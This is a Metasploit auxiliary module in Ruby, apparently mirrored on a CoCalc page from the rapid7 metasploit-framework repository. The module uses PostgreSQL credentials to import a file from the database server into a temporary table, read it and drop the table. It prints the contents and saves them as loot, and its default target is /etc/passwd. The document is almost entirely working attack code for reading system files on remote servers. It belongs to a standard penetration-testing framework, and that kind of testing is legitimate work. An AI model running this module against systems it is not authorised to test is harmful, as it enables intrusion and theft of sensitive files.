CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/admin/postgres/postgres_readfile.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::Postgres

8
  include Msf::Auxiliary::Report

9
  include Msf::OptionalSession::PostgreSQL

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'           => 'PostgreSQL Server Generic Query',

14
      'Description'    => %q{

15
          This module imports a file local on the PostgreSQL Server into a

16
          temporary table, reads it, and then drops the temporary table.

17
          It requires PostgreSQL credentials with table CREATE privileges

18
          as well as read privileges to the target file.

19
      },

20
      'Author'         => [ 'todb' ],

21
      'License'        => MSF_LICENSE

22
    ))

23


24
    register_options(

25
      [

26
        OptString.new('RFILE', [ true, 'The remote file', '/etc/passwd'])

27
      ]

28
    )

29


30
    deregister_options( 'SQL', 'RETURN_ROWSET' )

31
  end

32


33
  def rhost

34
    datastore['RHOST']

35
  end

36


37
  def rport

38
    datastore['RPORT']

39
  end

40


41
  def run

42
    self.postgres_conn = session.client if session

43
    ret = postgres_read_textfile(datastore['RFILE'])

44
    case ret.keys[0]

45
    when :conn_error

46
      print_error "#{rhost}:#{rport} Postgres - Authentication failure, could not connect."

47
    when :sql_error

48
      case ret[:sql_error]

49
      when /^C58P01/

50
        print_error "#{postgres_conn.peerhost}:#{postgres_conn.peerport} Postgres - No such file or directory."

51
        vprint_status "#{postgres_conn.peerhost}:#{postgres_conn.peerport} Postgres - #{ret[:sql_error]}"

52
      when /^C42501/

53
        print_error "#{postgres_conn.peerhost}:#{postgres_conn.peerport} Postgres - Insufficient file permissions."

54
        vprint_status "#{postgres_conn.peerhost}:#{postgres_conn.peerport} Postgres - #{ret[:sql_error]}"

55
      else

56
        print_error "#{postgres_conn.peerhost}:#{postgres_conn.peerport} Postgres - #{ret[:sql_error]}"

57
      end

58
    when :complete

59
      loot = ''

60
      ret[:complete].rows.each { |row|

61
        print_line(row.first)

62
        loot << row.first

63
      }

64
      # No idea what the actual ctype will be, text/plain is just a guess

65
      path = store_loot('postgres.file', 'text/plain', postgres_conn.peerhost, loot, datastore['RFILE'])

66
      print_good("#{postgres_conn.peerhost}:#{postgres_conn.peerport} Postgres - #{datastore['RFILE']} saved in #{path}")

67
      vprint_good  "#{postgres_conn.peerhost}:#{postgres_conn.peerport} Postgres - Command complete."

68
    end

69
    postgres_logout if self.postgres_conn && session.blank?

70
  end

71
end

72


73